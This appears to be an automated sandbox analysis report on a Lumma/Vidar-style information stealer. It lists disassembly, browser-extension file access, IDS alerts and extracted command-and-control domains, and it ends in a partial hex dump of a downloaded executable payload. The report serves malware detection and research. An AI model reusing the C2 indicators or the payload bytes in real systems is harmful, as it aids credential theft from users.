Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	11_2_0040F042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_0040D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	11_2_0040F807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	11_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	11_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	11_2_00447E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, esi	11_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	11_2_0044B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_00425030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]	11_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	11_2_0044B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_00427230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	11_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	11_2_004142E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	11_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	11_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	11_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	11_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	11_2_00442410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_0044B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	11_2_004314A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	11_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	11_2_00435519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_00433623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	11_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_00434629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	11_2_0040F63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	11_2_00414692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000668h]	11_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	11_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	11_2_0040F7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001C8h]	11_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000198h]	11_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	11_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	11_2_00444970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000884h]	11_2_00429978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_00420A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	11_2_00440A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	11_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	11_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	11_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	11_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	11_2_00444BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	11_2_0041AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	11_2_00448B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	11_2_00430CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	11_2_00405CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	11_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	11_2_00445DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	11_2_00448D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	11_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	11_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, 02h	11_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	11_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec ebx	11_2_0043FE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	11_2_00426FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [004521ECh]	11_2_0041FFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h	11_2_0042DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	11_2_0043BFF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056177 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI) : 192.168.2.6:57903 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.6:51828 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.6:50348 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.6:59417 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.6:51250 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.6:57908 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.6:57910 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.6:57906 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.6:57912 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2056176 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop) : 192.168.2.6:59699 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.6:57904 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.6:63755 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.6:57914 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.6:62300 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.6:61967 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.6:57916 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.6:57917 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.6:60424 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:57915 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:57881 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.6:57881
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.6:57880
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57906 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57906 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57910 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57912 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57910 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57912 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57908 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57908 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57914 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57914 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57904 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57917 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57904 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57917 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57919 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57919 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57903 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57903 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.6:57930
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.6:57929
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57916 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57916 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: wallkedsleeoi.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Yara detected RDPWrap Tool

Source: Yara match	File source: 22.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.2818115100.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RDPWInst.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.6:57922 -> 8.46.123.33:3389

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:29:04 GMTContent-Type: application/octet-streamContent-Length: 385064Last-Modified: Thu, 26 Sep 2024 22:09:48 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5dbac-5e028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 ae 05 00 00 20 00 00 00 b0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 e0 05 00 00 06 00 00 00 b2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce 05 00 00 00 00 00 48 00 00 00 02 00 05 00 80 bc 05 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 1c 59 59 6c 14 76 5e 87 dc f4 35 66 85 48 24 b2 ce 02 9f f7 2f fa 57 cb 61 b6 7a 7a f0 df 35 4f 10 9b 37 1c cd 12 66 9e 17 53 d5 6c 5c f1 52 42 af 6b 08 35 e6 ea 8e 7f 45 71 7f 85 08 89 95 76 f5 df 0e a5 d6 fc 42 00 1a 12 66 8a 8c a2 0d cc d6 dd fd 9a b7 bc c6 39 76 02 fa f3 3b 28 cc 46 d9 81 20 0a 4a 2a b2 67 cc 69 96 ae 28 1e d1 d6 18 42 b3 42 cb 4d 9a 73 8f a0 c3 3c 0d c8 75 62 e5 20 1b 6c f5 5d b3 87 96 ab bd 51 67 83 b4 d5 5c c3 42 63 2a 84 b1 06 91 e4 24 95 19 a0 1f c7 f8 aa f8 66 56 47 5a 94 db 00 2e f4 cb 98 c5 a0 c0 c1 38 d1 da 99 e2 a3 9c 0e 6c 48 3b 21 f8 0a 17 22 ae e3 f0 fb 82 f0 70 98 55 4f 04 38 d7 59 22 c7 e2 fb f1 64 f2 d1 be 5c eb 0e a2 64 44 22 b3 73 6d 7d cb 63 23 15 3f e1 34 3f 13 f1 59 23 dc 04 b7 a4 e3 17 cb 30 bb 1b 1d ff 56 53 cd bd 1d 58 bb 10 7c 89 e7 0c c4 9d 47 16 2e cb 67 ac 3a 21 72 4d 5b 7e 1b 01 94 65 bf 42 70 d5 e0 62 7a a7 7b 84 1c 13 a4 60 35 1d cc f3 7
